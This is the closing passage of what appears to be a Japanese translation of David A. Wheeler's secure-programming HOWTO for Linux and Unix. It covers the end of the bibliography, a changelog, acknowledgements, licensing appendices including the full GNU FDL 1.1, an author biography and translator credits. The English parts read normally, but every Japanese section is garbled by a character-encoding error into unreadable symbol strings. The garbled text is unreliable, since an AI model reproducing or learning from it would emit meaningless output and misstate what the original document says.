Engineering Capability Maturity Model (SSE CMM) Model Description
Document. Version 2.0. http://www.sse-cmm.org

[Stallings 1996] Stallings, William. Practical Cryptography for Data
Internetworks. Los Alamitos, CA: IEEE Computer Society Press. ISBN
0-8186-7140-8.

[Stein 1999]. Stein, Lincoln D. September 13, 1999. The World Wide Web
Security FAQ. Version 2.0.1 http://www.w3.org/Security/Faq/
www-security-faq.html

[Swan 2001] Swan, Daniel. January 6, 2001. comp.os.linux.security FAQ.
Version 1.0. http://www.linuxsecurity.com/docs/colsfaq.html.

[Swanson 1996] Swanson, Marianne, and Barbara Guttman. September 1996.
Generally Accepted Principles and Practices for Securing Information
Technology Systems. NIST Computer Security Special Publication (SP)
800-14. http://csrc.nist.gov/publications/nistpubs/index.html.

[Thompson 1974] Thompson, K. and D.M. Richie. July 1974. ``The UNIX
Time-Sharing System''. Communications of the ACM Vol. 17, No. 7. pp.
365-375.

[Torvalds 1999] Torvalds, Linus. February 1999. ``The Story of the
Linux Kernel''. Open Sources: Voices from the Open Source Revolution.
Edited by Chris Dibona, Mark Stone, and Sam Ockman. O'Reilly and
Associates. ISBN 1565925823. http://www.oreilly.com/catalog/opensources
/book/linus.html

[TruSecure 2001] TruSecure. August 2001. Open Source Security: A Look
at the Security Benefits of Source Code Access. http://
www.trusecure.com/html/tspub/whitepapers/open_source_security5.pdf

[Unknown] SETUID(7) http://www.homeport.org/~adam/setuid.7.html.

[Van Biesbrouck 1996] Van Biesbrouck, Michael. April 19, 1996. http://
www.csclub.uwaterloo.ca/u/mlvanbie/cgisec.

[van Oorschot 1994] van Oorschot, P. and M. Wiener. November 1994.
``Parallel Collision Search with Applications to Hash Functions and
Discrete Logarithms.'' Proceedings of ACM Conference on Computer and
Communications Security.

[Venema 1996] Venema, Wietse. 1996. Murphy's law and computer security.
http://www.fish.com/security/murphy.html

[Watters 1996] Watters, Arron, Guido van Rossum, James C. Ahlstrom.
1996. Internet Programming with Python. NY, NY: Henry Hold and Company,
Inc.

[Witten 2001] September/October 2001. Witten, Brian, Carl Landwehr, and
Michael Caloyannides. ``Does Open Source Improve System Security?''
IEEE Software. pp. 57-61. http://www.computer.org/software 

[Wood 1985] Wood, Patrick H. and Stephen G. Kochan. 1985. Unix System
Security. Indianapolis, Indiana: Hayden Books. ISBN 0-8104-6267-2.

[Wreski 1998] Wreski, Dave. August 22, 1998. Linux Security
Administrator's Guide. Version 0.98. http://www.nic.com/~dave/
SecurityAdminGuide/index.html

[Yoder 1998] Yoder, Joseph and Jeffrey Barcalow. 1998. Architectural
Patterns for Enabling Application Security. PLoP '97 http://
st-www.cs.uiuc.edu/~hanmer/PLoP-97/Proceedings/yoder.pdf

[Zalewski 2001] Zalewski, Michael. May 16-17, 2001. Delivering Signals
for Fun and Profit: Understanding, exploiting and preventing
signal-handling related vulnerabilities. Bindview Corporation. http://
razor.bindview.com/publish/papers/signals.txt

[Zoebelein 1999] Zoebelein, Hans U. April 1999. The Internet Operating
System Counter. http://www.leb.net/hzo/ioscount.

y IPA ̃ZLAEvO~Ou <http://www.ipa.go.jp/
security/awareness/vendor/programming/index.html> ɗ܂z

 

Appendix A. 

̃hLgɓāAȏoŋ߂̂̂L
ڂ܂B

2001-01-01 David A. Wheeler
   
    o[W 2.70Bdvȑނǉ܂BƂ΁ATCg
    ɂ܂ӂRec HTML  URI ̃tB^OAe
    |t@C̈啝ɋc_WJ܂B
   
2000-05-24 David A. Wheeler
   
    CZX GNU  GFDL ɕύX܂Be𑝂₵܂B
   
2000-04-21 David A. Wheeler
   
    o[W 2.00B2000 N 4  21 ɃhLg̋Lq`
    Linuxdoc DTD  the DocBook DTD ɕύX܂BύXɓĉ
    Ăꂽ Jorge Godoy Ɋӂ܂B
   
2000-04-04 David A. Wheeler
   
    o[W 1.60B Linux  Unix ̗Jo[悤ɕύXBKC
    hC̑啔͗҂Jo[Ă܂BJ҂̓AvP[V
    𗼎҂œƂ]łꍇAJo[̂͐
    ƂłB
   
2000-02-09 David A. Wheeler
   
    hLg Linux Documentation Project (LDP)ɓ܂B
   
1999-11-29 David A. Wheeler
   
    o[WBJ[XB
   
ύX_̏ڍׂ̓ICŁuChangeLogvt@Cpł܂B

 

Appendix B. Ƃ

                                    S͓SČBl̗͂F 
                                    ɂČB               
                                                                       
                                           񐹏⼌ 27  17(NIV)

dq[ŊԈႢwEĂꂽAJo[͈͂ɃAhoCX
ꂽAꂽ肵āA͂܂ĂꂽL̊FɊӂ
Ă܂Bdq[̃AhXɂ́uthanksvOɂĂ܂B
΁AʂɃ[𔭐i郁[[ȒPɂ̓AhX擾łȂ
łBʂ̖f[̃XgɊ܂܂Xɑ錠
ANɂ܂B

 E Neil Brown (thanks.neilb@cse.unsw.edu.au)
   
 E Martin Douda (thanks.mad@students.zcu.cz)
   
 E Jorge Godoy
   
 E Scott Ingram (thanks.scott@silver.jhuapl.edu)
   
 E Michael Kerrisk
   
 E Doug Kilpatrick
   
 E John Levon (moz@compsoc.man.ac.uk)
   
 E Ryan McCabe (thanks.odin@numb.org)
   
 E Paul Millar (thanks.paulm@astro.gla.ac.uk)
   
 E Chuck Phillips (thanks.cdp@peakpeak.com)
   
 E Martin Pool (thanks.mbp@humbug.org.au)
   
 E Eric S. Raymond (thanks.esr@snark.thyrsus.com)
   
 E Marc Welz
   
 E Eric Werme (thanks.werme@alpha.zk3.dec.com)
   
 

̃Xgɍڂė~́AݓIȈӌ dwheeler@dwheeler.com
<mailto:dwheeler@dwheeler.com> ܂őĂBݓIȈӌ𑗂
ӎڂė~Ȃ́AӌRgAᔻ񂹂Ă
ɂm点BʁAF͏܎^邱Ƃ]łƎvĂ
܂̂ŁAӂ̋C\킵ƎvĂ܂B́Av҂̕X
̖OhLĝ̃XgɒǉāARĝɏڂ
ɂẮAChangeLog(ICŗpł܂)ɏĒu܂BACf
BA𑗂Ăꂽ͔̂ނłAۃeLXgɋN͎̂głB
ԈႢƂĂAނӂ߂ȂłB邩
AʂɌݓIȈӌɑĂ΁AƎv܂B

 

Appendix C. hLg̃CZXɂ

                                    ̒̎ʂ͊eBō̒߂Ƃ 
                                    đSɌAlX͂̓ 
                                    B                           
                                                                       
                                     񐹏GXeL 3  14 (NIV)

̃hLg David A. Wheeler 쌠ێĂ܂ (Copyright
(C) 1999-2000 David A. Wheeler)B GNU General Public License (GPL) ɂ
ƂÂAƍĔzzяCĂ܂Bo[W 1.1 ȏ́A
Free Software Foundation ŏołĂĂ܂BύXs́u҂ɂ
āvŁA\Ɨ\̃eLXg͂܂BCZX̃Rs[͉L
 Appendix D ɂ܂B

̏ł͑ Web TCg~[ĂǂƂɂȂĂ܂A
L̏ɕK]ĂB

 E }X^[̃TCg玩IɃ~[XV邱ƁB
   
 E }X^[̃TCg̏ꏊ(http://www.dwheeler.com/secure-programs) 
    nCp[eLXg̃N`Ŗ邱ƁB
   
 E (David A. Wheeler)֒҂ɑ΂銴ӂ̈ӂ\킷ƁB
   
 

ŏ 2 _͎ɁAJԂ̂ԈႢ𕷂̂h߂łB 1
NOɏCԈႢɂĕ͍̂蕨łBhLg
~[ĂȂƂRŁB}X^[̃TCgɃN𒣂
A[U̓~[ŐVǂmFł܂B͋łȃZLeB
KvƂĂTCg̖ɉߕqȂ̂ŁAC^[lbgɕʂɐڑ
댯Ƃ܂B悤ȏ󋵂Ȃ΁ȂË_悤ɂ
BĎɂ͔}̂^ŁAXVĂB

̃CZXł̓hLg͏C\łB̂͂Ȃ
̂ (܂蓐p)Ƃ͎咣ł܂BCo[WIWi
iƓłƎ咣ł܂BiCĂAiׂĂ̒
͈ړ܂B͒쌠֘A̖@upubNEhCv
ȍił͂܂BCZXɂĂ̏ڍׂ Appendix D QƂ
BCZXĂ邩^₪ȂAɘAĂ
BȂsύXƂ܂Ƃ߂̌(݂ David A. Wheeler
)ɑ΁AĂ̕ύX͑̕ύXƂƂɌ{ɔf܂B

Ƃ͌̂́A͖@Ƃł͂܂B쌠̖@ł́Ai̍\
vfƂĖɂȂȂ̂ɑ΂ẮA쌠F߂ĂȂ
AƂ̂̒҂ƂĂ̗ł(Ƃ΁Au B tbg B t
bgE}Ci[̃R[ȟׂĎĂv)B{̃vO
rƁAɑȂt̒fЂ́A킸ȑ傫ƂӖł͓
łB͂܂ŁA̐lR[hɂ́AꂪƂ
\邱Ƃɓw߂Ă܂BłF̒ɂ́ÃR[h̖@I
ȈʒuÂCɂȂȂƎv܂BŁAF񂪂
̃R[hF̃\tgEFAŗpł邱Ƃ͂肳Ǝv
܂BāÃhLgɒڏĂR[hׂ̍Ȓf
́AuMIT CZXv̌Ń[X܂B@Iɋقǂ̐񂪂
Ƃۏ؂܂B

  Source code in this book not otherwise identified is                 
  Copyright (c) 1999-2001 David A. Wheeler.                            
                                                                       
  Permission is hereby granted, free of charge, to any person          
  obtaining a copy of the source code in this book not                 
  otherwise identified (the "Software"), to deal in the                
  Software without restriction, including without limitation           
  the rights to use, copy, modify, merge, publish, distribute,         
  sublicense, and/or sell copies of the Software, and to               
  permit persons to whom the Software is furnished to do so,           
  subject to the following conditions:                                 
                                                                       
  The above copyright notice and this permission notice shall be       
  included in all copies or substantial portions of the Software.      
                                                                       
  THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,      
  EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE                 
  WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR              
  PURPOSE AND NONINFRINGEMENT.                                         
  IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE                
  LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY,                    
  WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE,                 
  ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE              
  OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.                        
y󒐁FeI[v\[XñCZX́A                           
http://www.opensource.org                                              
 QlɂȂ܂BOSG-JP <http://www.opensource.jp>                   
 ܂A܂ MIT CZX͖|󂳂Ă܂z               

 

Appendix D. GNU Free Documentation License

Version 1.1, March 2000

Copyright 2000

      Free Software Foundation, Inc. 
      59 Temple Place, Suite 330, 
      Boston, 
      MA  
      02111-1307  
      USA
    

Everyone is permitted to copy and distribute verbatim copies of this
license document, but changing it is not allowed.

0. PREAMBLE
   
    The purpose of this License is to make a manual, textbook, or other
    written document "free" in the sense of freedom: to assure everyone
    the effective freedom to copy and redistribute it, with or without
    modifying it, either commercially or noncommercially. Secondarily,
    this License preserves for the author and publisher a way to get
    credit for their work, while not being considered responsible for
    modifications made by others.
   
    This License is a kind of "copyleft", which means that derivative
    works of the document must themselves be free in the same sense. It
    complements the GNU General Public License, which is a copyleft
    license designed for free software.
   
    We have designed this License in order to use it for manuals for
    free software, because free software needs free documentation: a
    free program should come with manuals providing the same freedoms
    that the software does. But this License is not limited to software
    manuals; it can be used for any textual work, regardless of subject
    matter or whether it is published as a printed book. We recommend
    this License principally for works whose purpose is instruction or
    reference.
   
1. APPLICABILITY AND DEFINITIONS
   
    This License applies to any manual or other work that contains a
    notice placed by the copyright holder saying it can be distributed
    under the terms of this License. The "Document" , below, refers to
    any such manual or work. Any member of the public is a licensee,
    and is addressed as "you".
   
    A "Modified Version" of the Document means any work containing the
    Document or a portion of it, either copied verbatim, or with
    modifications and/or translated into another language.
   
    A "Secondary Section" is a named appendix or a front-matter section
    of the Document that deals exclusively with the relationship of the
    publishers or authors of the Document to the Document's overall
    subject (or to related matters) and contains nothing that could
    fall directly within that overall subject. (For example, if the 
    Document is in part a textbook of mathematics, a Secondary Section
    may not explain any mathematics.) The relationship could be a
    matter of historical connection with the subject or with related
    matters, or of legal, commercial, philosophical, ethical or
    political position regarding them.
   
    The "Invariant Sections" are certain Secondary Sections whose
    titles are designated, as being those of Invariant Sections, in the
    notice that says that the Document is released under this License.
   
    The "Cover Texts" are certain short passages of text that are
    listed, as Front-Cover Texts or Back-Cover Texts, in the notice
    that says that the Document is released under this License.
   
    A "Transparent" copy of the Document means a machine-readable copy,
    represented in a format whose specification is available to the
    general public, whose contents can be viewed and edited directly
    and straightforwardly with generic text editors or (for images
    composed of pixels) generic paint programs or (for drawings) some
    widely available drawing editor, and that is suitable for input to
    text formatters or for automatic translation to a variety of
    formats suitable for input to text formatters. A copy made in an
    otherwise Transparent file format whose markup has been designed to
    thwart or discourage subsequent modification by readers is not 
    Transparent. A copy that is not "Transparent" is called "Opaque".
   
    Examples of suitable formats for Transparent copies include plain
    ASCII without markup, Texinfo input format, LaTeX input format,
    SGML or XML using a publicly available DTD, and standard-conforming
    simple HTML designed for human modification. Opaque formats include
    PostScript, PDF, proprietary formats that can be read and edited
    only by proprietary word processors, SGML or XML for which the DTD
    and/or processing tools are not generally available, and the
    machine-generated HTML produced by some word processors for output
    purposes only.
   
    The "Title Page" means, for a printed book, the title page itself,
    plus such following pages as are needed to hold, legibly, the
    material this License requires to appear in the title page. For
    works in formats which do not have any title page as such, "Title
    Page" means the text near the most prominent appearance of the
    work's title, preceding the beginning of the body of the text.
   
2. VERBATIM COPYING
   
    You may copy and distribute the Document in any medium, either
    commercially or noncommercially, provided that this License, the
    copyright notices, and the license notice saying this License
    applies to the Document are reproduced in all copies, and that you
    add no other conditions whatsoever to those of this License. You
    may not use technical measures to obstruct or control the reading
    or further copying of the copies you make or distribute. However,
    you may accept compensation in exchange for copies. If you
    distribute a large enough number of copies you must also follow the
    conditions in section 3.
   
    You may also lend copies, under the same conditions stated above,
    and you may publicly display copies.
   
3. COPYING IN QUANTITY
   
    If you publish printed copies of the Document numbering more than
    100, and the Document's license notice requires Cover Texts, you
    must enclose the copies in covers that carry, clearly and legibly,
    all these Cover Texts: Front-Cover Texts on the front cover, and
    Back-Cover Texts on the back cover. Both covers must also clearly
    and legibly identify you as the publisher of these copies. The
    front cover must present the full title with all words of the title
    equally prominent and visible. You may add other material on the
    covers in addition. Copying with changes limited to the covers, as
    long as they preserve the title of the Document and satisfy these
    conditions, can be treated as verbatim copying in other respects.
   
    If the required texts for either cover are too voluminous to fit
    legibly, you should put the first ones listed (as many as fit
    reasonably) on the actual cover, and continue the rest onto
    adjacent pages.
   
    If you publish or distribute Opaque copies of the Document
    numbering more than 100, you must either include a machine-readable
    Transparent copy along with each Opaque copy, or state in or with
    each Opaque copy a publicly-accessible computer-network location
    containing a complete Transparent copy of the Document, free of
    added material, which the general network-using public has access
    to download anonymously at no charge using public-standard network
    protocols. If you use the latter option, you must take reasonably
    prudent steps, when you begin distribution of Opaque copies in
    quantity, to ensure that this Transparent copy will remain thus
    accessible at the stated location until at least one year after the
    last time you distribute an Opaque copy (directly or through your
    agents or retailers) of that edition to the public.
   
    It is requested, but not required, that you contact the authors of
    the Document well before redistributing any large number of copies,
    to give them a chance to provide you with an updated version of the
    Document.
   
4. MODIFICATIONS
   
    You may copy and distribute a Modified Version of the Document
    under the conditions of sections 2 and 3 above, provided that you
    release the Modified Version under precisely this License, with the
    Modified Version filling the role of the Document, thus licensing
    distribution and modification of the Modified Version to whoever
    possesses a copy of it. In addition, you must do these things in
    the Modified Version:
   
     A. Use in the Title Page (and on the covers, if any) a title
        distinct from that of the Document, and from those of previous
        versions (which should, if there were any, be listed in the
        History section of the Document). You may use the same title as
        a previous version if the original publisher of that version
        gives permission.
       
     B. List on the Title Page, as authors, one or more persons or
        entities responsible for authorship of the modifications in the
        Modified Version, together with at least five of the principal
        authors of the Document (all of its principal authors, if it
        has less than five).
       
     C. State on the Title Page the name of the publisher of the 
        Modified Version, as the publisher.
       
     D. Preserve all the copyright notices of the Document.
       
     E. Add an appropriate copyright notice for your modifications
        adjacent to the other copyright notices.
       
     F. Include, immediately after the copyright notices, a license
        notice giving the public permission to use the Modified Version
        under the terms of this License, in the form shown in the
        Addendum below.
       
     G. Preserve in that license notice the full lists of Invariant
        Sections and required Cover Texts given in the Document's
        license notice.
       
     H. Include an unaltered copy of this License.
       
     I. Preserve the section entitled "History", and its title, and add
        to it an item stating at least the title, year, new authors,
        and publisher of the Modified Version as given on the Title
        Page. If there is no section entitled "History" in the Document
        , create one stating the title, year, authors, and publisher of
        the Document as given on its Title Page, then add an item
        describing the Modified Version as stated in the previous
        sentence.
       
     J. Preserve the network location, if any, given in the Document
        for public access to a Transparent copy of the Document, and
        likewise the network locations given in the Document for
        previous versions it was based on. These may be placed in the
        "History" section. You may omit a network location for a work
        that was published at least four years before the Document
        itself, or if the original publisher of the version it refers
        to gives permission.
       
     K. In any section entitled "Acknowledgements" or "Dedications",
        preserve the section's title, and preserve in the section all
        the substance and tone of each of the contributor
        acknowledgements and/or dedications given therein.
       
     L. Preserve all the Invariant Sections of the Document, unaltered
        in their text and in their titles. Section numbers or the
        equivalent are not considered part of the section titles.
       
     M. Delete any section entitled "Endorsements". Such a section may
        not be included in the Modified Version.
       
     N. Do not retitle any existing section as "Endorsements" or to
        conflict in title with any Invariant Section.
       
    If the Modified Version includes new front-matter sections or
    appendices that qualify as Secondary Sections and contain no
    material copied from the Document, you may at your option designate
    some or all of these sections as invariant. To do this, add their
    titles to the list of Invariant Sections in the Modified Version's
    license notice. These titles must be distinct from any other
    section titles.
   
    You may add a section entitled "Endorsements", provided it contains
    nothing but endorsements of your Modified Version by various
    parties--for example, statements of peer review or that the text
    has been approved by an organization as the authoritative
    definition of a standard.
   
    You may add a passage of up to five words as a Front-Cover Text,
    and a passage of up to 25 words as a Back-Cover Text, to the end of
    the list of Cover Texts in the Modified Version. Only one passage
    of Front-Cover Text and one of Back-Cover Text may be added by (or
    through arrangements made by) any one entity. If the Document
    already includes a cover text for the same cover, previously added
    by you or by arrangement made by the same entity you are acting on
    behalf of, you may not add another; but you may replace the old
    one, on explicit permission from the previous publisher that added
    the old one.
   
    The author(s) and publisher(s) of the Document do not by this
    License give permission to use their names for publicity for or to
    assert or imply endorsement of any Modified Version .
   
5. COMBINING DOCUMENTS
   
    You may combine the Document with other documents released under
    this License, under the terms defined in section 4 above for
    modified versions, provided that you include in the combination all
    of the Invariant Sections of all of the original documents,
    unmodified, and list them all as Invariant Sections of your
    combined work in its license notice.
   
    The combined work need only contain one copy of this License, and
    multiple identical Invariant Sections may be replaced with a single
    copy. If there are multiple Invariant Sections with the same name
    but different contents, make the title of each such section unique
    by adding at the end of it, in parentheses, the name of the
    original author or publisher of that section if known, or else a
    unique number. Make the same adjustment to the section titles in
    the list of Invariant Sections in the license notice of the
    combined work.
   
    In the combination, you must combine any sections entitled
    "History" in the various original documents, forming one section
    entitled "History"; likewise combine any sections entitled
    "Acknowledgements", and any sections entitled "Dedications". You
    must delete all sections entitled "Endorsements."
   
6. COLLECTIONS OF DOCUMENTS
   
    You may make a collection consisting of the Document and other
    documents released under this License, and replace the individual
    copies of this License in the various documents with a single copy
    that is included in the collection, provided that you follow the
    rules of this License for verbatim copying of each of the documents
    in all other respects.
   
    You may extract a single document from such a collection, and
    distribute it individually under this License, provided you insert
    a copy of this License into the extracted document, and follow this
    License in all other respects regarding verbatim copying of that
    document.
   
7. AGGREGATION WITH INDEPENDENT WORKS
   
    A compilation of the Document or its derivatives with other
    separate and independent documents or works, in or on a volume of a
    storage or distribution medium, does not as a whole count as a 
    Modified Version of the Document, provided no compilation copyright
    is claimed for the compilation. Such a compilation is called an
    "aggregate", and this License does not apply to the other
    self-contained works thus compiled with the Document , on account
    of their being thus compiled, if they are not themselves derivative
    works of the Document. If the Cover Text requirement of section 3
    is applicable to these copies of the Document, then if the Document
    is less than one quarter of the entire aggregate, the Document's 
    Cover Texts may be placed on covers that surround only the Document
    within the aggregate. Otherwise they must appear on covers around
    the whole aggregate.
   
8. TRANSLATION
   
    Translation is considered a kind of modification, so you may
    distribute translations of the Document under the terms of section
    4. Replacing Invariant Sections with translations requires special
    permission from their copyright holders, but you may include
    translations of some or all Invariant Sections in addition to the
    original versions of these Invariant Sections. You may include a
    translation of this License provided that you also include the
    original English version of this License. In case of a disagreement
    between the translation and the original English version of this
    License, the original English version will prevail.
   
9. TERMINATION
   
    You may not copy, modify, sublicense, or distribute the Document
    except as expressly provided for under this License. Any other
    attempt to copy, modify, sublicense or distribute the Document is
    void, and will automatically terminate your rights under this
    License. However, parties who have received copies, or rights, from
    you under this License will not have their licenses terminated so
    long as such parties remain in full compliance.
   
10. FUTURE REVISIONS OF THIS LICENSE
   
    The Free Software Foundation <http://www.gnu.org/fsf/fsf.html> may
    publish new, revised versions of the GNU Free Documentation License
    from time to time. Such new versions will be similar in spirit to
    the present version, but may differ in detail to address new
    problems or concerns. See http://www.gnu.org/copyleft/ <http://
    www.gnu.org/copyleft>.
   
    Each version of the License is given a distinguishing version
    number. If the Document specifies that a particular numbered
    version of this License "or any later version" applies to it, you
    have the option of following the terms and conditions either of
    that specified version or of any later version that has been
    published (not as a draft) by the Free Software Foundation. If the 
    Document does not specify a version number of this License, you may
    choose any version ever published (not as a draft) by the Free
    Software Foundation.
   
Addendum
   
    To use this License in a document you have written, include a copy
    of the License in the document and put the following copyright and
    license notices just after the title page:
   
    Copyright YEAR YOUR NAME.
   
    Permission is granted to copy, distribute and/or modify this
    document under the terms of the GNU Free Documentation License,
    Version 1.1 or any later version published by the Free Software
    Foundation; with the Invariant Sections being LIST THEIR TITLES,
    with the Front-Cover Texts being LIST, and with the Back-Cover
    Texts being LIST. A copy of the license is included in the section
    entitled "GNU Free Documentation License".
   
    If you have no Invariant Sections, write "with no Invariant
    Sections" instead of saying which ones are invariant. If you have
    no Front-Cover Texts, write "no Front-Cover Texts" instead of
    "Front-Cover Texts being LIST"; likewise for Back-Cover Texts.
   
    If your document contains nontrivial examples of program code, we
    recommend releasing these examples in parallel under your choice of
    free software license, such as the GNU General Public License
    <http://www.gnu.org/copyleft/gpl.html>, to permit their use in free
    software.
   
    y󒐁F{ɂẮAOSG-JP ɂ GNU FDL (t[p
    _) { <http://www.opensource.jp/fdl/fdl.ja.txt>Ql
    ɂĂz
   
 

Appendix E. About the Author

David A. Wheeler is an expert in computer security and has long
specialized in development techniques for large and high-risk software
systems. He has been involved in software development since the
mid-1970s, and been involved with Unix and computer security since the
early 1980s. His areas of knowledge include computer security, software
safety, vulnerability analysis, inspections, Internet technologies,
software-related standards (including POSIX), real-time software
development techniques, and numerous computer languages (including Ada,
C, C++, Perl, Python, and Java).

Mr. Wheeler is co-author and lead editor of the IEEE book Software
Inspection: An Industry Best Practice, author of the book Ada95: The
Lovelace Tutorial, and co-author of the GNOME User's Guide. He is also
the author of many smaller papers and articles, including the Linux 
Program Library HOWTO.

Mr. Wheeler hopes that, by making this document available, other
developers will make their software more secure. You can reach him by
email at dwheeler@dwheeler.com (no spam please), and you can also see
his web site at http://www.dwheeler.com. y󒐁F́uAbout the Author
v GNU FDL ߂uύXs (Invariant Sections)vɎw肵Ă
̂ŁÂ܂܌fڂ܂z

 

Appendix F. {Ŏӎ

|sɓāAL̕XɂbɂȂ܂B̏Ă
\グ܂B肪ƂAFI

 E Mk
   
 E 䂫Ђ
   
 E p͂
   
 E L
   
 E щT
   
 E MF
   
 E R`V
   
 E {Jv
   
Notes

[1] ZpIɂ̓nCp[eLXg̃ŃAuuniform resource identifier
    v(URI) Ƃ܂BuUniform Resource Locatorv(URL)́AURI ̃Tu
    ZbgƂĎgA܂ANZXi(Ƃ΃lbg[Ńu
    ʒuv)\邱ƂŁA\[X肵Ă܂B\[X̖̂
    ̑̑ł͓肵܂BuURLvuURIvƓӖŎgꍇ 
    ̂łA URI Ă钆ŁAԎgĂ̂
    URL łBƂ΁AURI ŎgpGR[ĥƂۂ́u 
    URL GR[fBOvƌĂł܂B                             

